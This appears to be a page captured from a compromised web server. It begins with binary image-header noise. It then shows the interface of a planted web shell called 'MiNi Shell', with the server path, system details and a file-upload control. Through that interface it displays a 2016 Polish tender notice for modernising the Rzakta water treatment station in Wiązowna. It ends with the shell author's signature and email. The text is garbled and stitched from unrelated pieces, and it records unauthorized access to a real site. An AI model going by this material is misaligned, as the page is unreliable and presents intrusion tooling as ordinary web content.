JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160407/80428-N-2016.html

<p class="kh_header"><b>Wiązowna: Modernizacja Stacji Uzdatniania Wody w Rzakcie - rozbudowa i przebudowa</b><br>
<b>Numer ogłoszenia: 80428 - 2016; data zamieszczenia: 07.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Wodociągów i Kanalizacji w Wiązownie , ul. Boryszewska 2, 05-462 Wiązowna, woj. mazowieckie, tel. 22 789 01 33, faks 22 789 01 33 wew. 108.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zwik-wiazowna.pl, zwik-wiazowna.bip.eur.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> zwik-wiazowna.pl, zwik-wiazowna.bip.eur.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: sektor wodno - kanalizacyjny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja Stacji Uzdatniania Wody w Rzakcie - rozbudowa i przebudowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Modernizacja Stacji Uzdatniania Wody w Rzakcie - rozbudowa i przebudowa.
Szczegółowy opis przedmiotu zamówienia określa:
1. Dokumentacja projektowa pn.: Projektu budowlanego przebudowy i rozbudowy Stacji Uzdatniania Wody Rzakta wraz z niezbędną infrastrukturą, działka nr ew. 120, obręb geod. Rzakta, jedn. ewidencyjna Wiązowna, powiat Otwocki, woj. mazowieckie, wykonanym przez firmę MASKO sp. z o.o. z dnia 20.05.2015 r. zatwierdzonych decyzją pozwolenie na budowę Starosty Otwockiego nr 1045 P/2015 z dnia 22.10.2015 r., określonych w:
1) tom I - Projekt zagospodarowania terenu,
2) tom II - Projekt architektoniczny,
3) tom III - Projekt technologiczny,
4) tom IV - Projekt konstrukcji budynku stacji uzdatniania wody,
5) tom V - Projekt konstrukcji zbiornika,
6) tom VI - Projekt instalacji wewnętrznych wod-kan, ogrzewania i wentylacji,
7) tom VII - Projekt branży drogowej układu komunikacji wewnętrznej,
8) tom VIII - Projekt instalacji elektrycznych stacji uzdatniania wody Rzakta,
9) opinia geotechniczna wraz z dokumentacją badań podłoża gruntowego dla potrzeb projektu budowlanego rozbudowy SUW w miejscowości Rzakta,
która stanowi Załącznik nr 8 do SIWZ.
2. Branżowa szczegółowa specyfikacja techniczna wykonania i odbioru robót:
1) branża elektryczna,
2) branża sanitarna,
3) branża budowlano-konstrukcyjna,
4) branża drogowa,
która stanowi Załącznik nr 9 do SIWZ.
3. Wytyczne dla zakupu kontenera (pomieszczenia) dla agregatu prądotwórczego,
które stanowią Załącznik nr 10 do SIWZ.
4. Operat wodnoprawny na pobór wód podziemnych dla potrzeb grupowego wodociągu wiejskiego we wsi Rzakta oraz eksploatacje urządzeń służących do poboru i uzdatniania wody, zatwierdzony Decyzją Starosty Otwockiego nr 651/2008 z dnia 03.11.2008 r. pozwolenie wodnoprawne na pobór wód podziemnych,
który stanowi Załącznik nr 11 do SIWZ.
5. Operat wodnoprawny na odprowadzanie ścieków (wód popłucznych) ze Stacji Uzdatniania Wody w Rzakcie do ziemi - rowu melioracyjnego, zatwierdzony Decyzją Starosty Otwockiego Nr 106/2014 z dnia 07.04.2014 r. pozwolenie wodnoprawne na szczególne korzystanie z wód - odprowadzanie ścieków - wód popłucznych ze Stacji Uzdatniania Wody w Rzakcie do urządzenia melioracji wodnych szczegółowych - rowu A, na terenie działki nr ew. 120, w obrębie Rzakta,
który stanowi Załącznik nr 12 do SIWZ.
6. Sprawozdania z badań wody surowej ze studni głębinowych nr 3 i nr 4 z SUW Rzakta, 
które stanowią Załącznik nr 13 do SIWZ.
7. Przedmiary robót, stanowiące uzupełnienie do opinii przedmiotu zamówienia, informujące o ilości robót na jakie oszacował Zamawiający wielkość zamówienia, 
które stanowią Załącznik nr 14 do SIWZ.

W przypadku rozbieżności wielkości i rodzaju robót pomiędzy dokumentami: projektem budowlanym, STWiOR, przedmiarami robót, Wykonawca przy realizacji umowy będzie kierował się w pierwszej kolejności projektem budowlanym.

Zakres rzeczowy przedmiotu zamówienia obejmuje także:
1. organizację placu budowy,
2. pełną obsługę geodezyjną - tyczenie obiektu i wykonanie geodezyjnej inwentaryzacji  powykonawczej w 2 egzemplarzach,
3. zabezpieczenie robót pod względem BHP,
4. ubezpieczenie robót,
5. wykonanie przedmiotu umowy z materiałów odpowiadających wymaganiom określonym w art. 10 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2013 r., poz. 1409 z późn. zm.)
6. wykonanie wszystkich niezbędnych robót nieuwzględnionych w dokumentacji i koniecznych korekt wynikłych w trakcie realizacji przedmiotu umowy, niezbędnych do prawidłowego przedmiotu zamówienia,
7. wykonanie instrukcji eksploatacji stacji uzdatniania wody i instrukcji BHP, 
8. bezpłatne przeszkolenie pracowników,
9. wykonanie oznakowania obiektów, rurociągów, instalacji, punktów AKPiA zgodnie ze schematem technologicznym,
10. doprowadzenie do należytego stanu i porządku terenu budowy po realizacji inwestycji,
11. wykonanie bezpłatnych przeglądów gwarancyjnych - raz w roku w okresie udzielonej przez Wykonawcę gwarancji,
12. sporządzenie i dostarczenie Zamawiającemu dokumentacji powykonawczej w 2 egzemplarzach, niezbędnych do uzyskania pozwolenia na użytkowanie obiektu,
13. uzyskanie oceny higienicznej na zastosowane materiały i urządzenia użyte przy realizacji przedmiotu zamówienia z Państwowego Powiatowego Inspektoratu Sanitarnego w Otwocku, zgodnie z Rozporządzeniem Ministra Zdrowia w sprawie jakości wody przeznaczonej do spożycia przez ludzi z dnia 13 listopada 2015 r. (Dz. U. Z 2015 r. poz. 1989),
14. wykonanie badań wody na podstawie Rozporządzenia Ministra Zdrowia w sprawie jakości wody przeznaczonej do spożycia przez ludzi z dnia 13 listopada 2015 r. (Dz. U. Z 2015 r. poz. 1989) poprzez dostarczenie pozytywnych wyników wody:
1) w zakresie wody uzdatnionej:
a) podstawowych wymagań mikrobiologicznych (zgodnie z załącznikiem nr 1 do ww. rozporządzenia), 
b) podstawowych wymagań chemicznych, jakim powinna odpowiadać woda (zgodnie z załącznikiem nr 2 ww. do rozporządzenia),
c) dodatkowych wymagań mikrobiologicznych, organoleptycznych, fizykochemicznych oraz dotyczących substancji promieniotwórczych, jakim powinna odpowiadać woda (zgodnie z załącznikiem nr 3 do w/w rozporządzenia),
d) dodatkowe wymagania chemiczne, jakim powinna odpowiadać woda (zgodnie z załącznikiem nr 4 do ww. rozporządzenia),
2) w zakresie wody surowej dla dwóch istniejących ujęć wody:
a) parametry objęte monitoringiem kontrolnym (zgodnie z załącznikiem nr 5 do ww. rozporządzenia).
Wszystkie zadania, niezbędne uzgodnienia oraz opinie nieokreślone w niniejszym zamówieniu, a które są konieczne dla realizacji i prawidłowego ukończenia przedmiotu zamówienia uznaje się za wchodzące w zakres obowiązków Wykonawcy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.00.00-2, 45.25.20.00-8, 45.24.72.70-3, 45.20.00.00-9, 45.23.21.50-8, 45.23.24.30-5, 45.33.00.00-9, 45.31.00.00-3, 45.23.14.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 25.000,00 zł (słownie: dwadzieścia pięć tysięcy złotych). 
Wadium może być wniesione w jednej lub kilku formach:
a) pieniądzu (deponowane na koncie sum depozytowych), wpłacone na konto B.S. Wiązowna 
96 8001 0005 2003 0020 0680 0009.
b) poręczeniach bankowych,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Z 2000 r. Nr 109, poz. 1158, z późn. zm.).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia.
Wykonawca spełni ten warunek jeżeli złoży oświadczenie o spełnianiu warunków udziału w postępowaniu na formularzu stanowiącym załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada wiedzę i doświadczenie:
1) w okresie ostatnich 5 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie roboty budowlane związane z wykonaniem budowy, rozbudowy lub przebudowy stacji uzdatniania wody, na kwotę nie mniejszą niż 1.500.000,00 zł brutto każda,
 2) wykonawca spełni ten warunek jeżeli złoży oświadczenie, że posiada wiedzę i doświadczenie niezbędne do wykonania zamówienia (stanowiące załącznik nr 2 do SIWZ) oraz złoży załącznik nr 5 do SIWZ WYKAZ WYKONANYCH ROBÓT. Do załącznika nr 5 należy załączyć dowody czy roboty te zostały wykonane w sposób należyty oraz wskazujące czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeżeli złoży oświadczenie o spełnianiu warunków udziału w postępowaniu na formularzu stanowiącym załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest dysponować na etapie realizacji inwestycji osobami, które posiadają uprawnienia budowlane w specjalności: 
 1) konstrukcyjno-budowlanej,
 2) instalacyjnej w zakresie sieci, instalacji wodociągowych i kanalizacyjnych,
 3) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
	lub uprawnienia równoważne wydane na podstawie wcześniej obowiązujących przepisów.
Kierownik budowy, dla którego wymaga się posiadania uprawnień budowlanych w specjalności konstrukcyjno-budowlanych, oprócz stosownych uprawnień i aktualnym zaświadczeniu o przynależności do Okręgowej Izby Inżynierów, winien wykazać się minimum 3 letnim doświadczeniem w kierowaniu robotami.
Wykonawca spełni ten warunek składając oświadczenie stanowiące załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi spełniać następujące warunki dotyczące sytuacji ekonomicznej i finansowej, w tym:
 1) Wykonawca musi posiadać środki finansowe lub zdolność kredytową nie mniejszą niż 1.500.000,00 zł brutto,
 2) Wymagane jest posiadanie opłaconej polisy, a w przypadku jej braku, innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Kwota ubezpieczenia nie może być mniejsza niż 500.000,00 PLN brutto. 
Wykonawca spełni ten warunek składając oświadczenie stanowiące załącznik nr 2 do SIWZ oraz dokumenty potwierdzające wysokość środków finansowych bądź zdolności kredytowej oraz opłaconą polisę lub inny dokument potwierdzający, że wykonawca jest ubezpieczony.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Okres gwarancji - 4</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany wprowadzone do umowy wymagają obustronnej zgody oraz formy pisemnej pod rygorem nieważności i muszą być zgodne z art. 144 ust. 1 ustawy Pzp.
 2. Na podstawie art. 144 dopuszcza się istotne zmiany przedmiotu umowy lub umówionego terminu w następujących przypadkach:
 1) konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np.: w zakresie zmiany wysokości stawki podatku VAT),
 2) wystąpią odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie nie zinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych,
 3) zajdzie konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót,
 4) zachodzi konieczność wykonania zamówienia dodatkowego w rozumieniu przepisów Pzp,
 5) nastąpi odmowa wydania lub opóźnienie w wydaniu przez organy administracyjne lub inne podmioty decyzji, zezwoleń, zatwierdzeń z przyczyn niezawinionych przez Wykonawcę,
 6) gdy zmienią się warunki pogodowe nie pozwalające na wykonanie robót zgodnie z wymaganiami technologicznymi lub specyfikacją techniczną,
 7) w przypadku zaistnienia okoliczności mających charakter tzw. siły wyższej w rozumieniu przepisów Kodeksu cywilnego,
 8) z brakiem możliwości prowadzenia robót na skutek obiektywnych warunków klimatycznych tj. gdy istniejące warunki atmosferyczne uniemożliwiają wykonanie robót budowlanych zgodnie z obowiązującymi warunkami technicznymi oraz technologia robót przyjętą w zatwierdzonym projekcie budowlanym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> zwik-wiazowna.bip.eur.pl, zwik-wiazowna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Wodociągów i Kanalizacji w Wiązownie
ul. Boryszewska 2, 05-462 Wiązowna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2016 godzina 12:00, miejsce: Zakład Wodociągów i Kanalizacji w Wiązownie
ul. Boryszewska 2, 05-462 Wiązowna (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com